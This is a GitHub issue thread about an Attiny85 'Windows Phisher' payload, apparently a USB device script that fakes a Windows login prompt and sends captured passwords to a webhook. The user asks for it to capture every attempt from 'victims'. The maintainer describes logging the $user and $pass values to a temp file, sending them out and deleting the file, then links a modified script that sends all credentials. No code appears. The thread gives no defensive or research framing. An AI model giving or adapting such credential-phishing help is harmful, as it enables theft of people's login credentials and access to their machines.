### ISSUE TITLE
Windows Phisher - How to make all credentials valid???

### ISSUE THREAD

**Issue by Zeymare** [MTK911/Attiny85#4]
Hi,
first off i wanna say the Windows Phisher is absolutetly amazing man, it works like a charm on Pcs. But the Problem is the Domains. For Example: if to login you gotta type z.soliman as username and 1Zi1Zi1Z as pw, and then you let the phisher run on the pc it doesnt accept it as the real credentials. I think the problem is that if you login, Windows welcomes you with your real name (for example if your username was z.soliman, windows greets you with SOLIMAN Ziad) and i suppose this is the username that actually counts in the credentials, but no victim would think to type that in.
So in short what i am asking is: Could you fix this OR make it accept NON VALID Credentials too OR Make it send Failed attempts to webhook too instead of only the right ones.
I am not experienced at all, thats why i need your help. Thanks in advance!

**Comment by MTK911** [comment]
Hey @Zeymare ,
Thanks for liking the script, Yes it is true that you need to write username as z.soliman not the name which is shown on login screen and answering your second question regarding logging all credentials including wrong ones. yes, it is possible to log them as well but it is a feature request and it will take time even though it is not big of a task but i have to find time for it.
If you can do it yourself you can log all given credentials by variable name $user and $pass append them in temporary directory and send them once correct credentials are given and remove the temporary file on exit.

**Comment by MTK911** [comment]
Hello @Zeymare ,
I have created what you asked for, you can download this new script from the following link:
https://github.com/MTK911/Attiny85/blob/master/payloads/Windows%20Phisher/Zeymare_Windows_Phisher.ino

Now all credentials (valid/invalid) are sent.
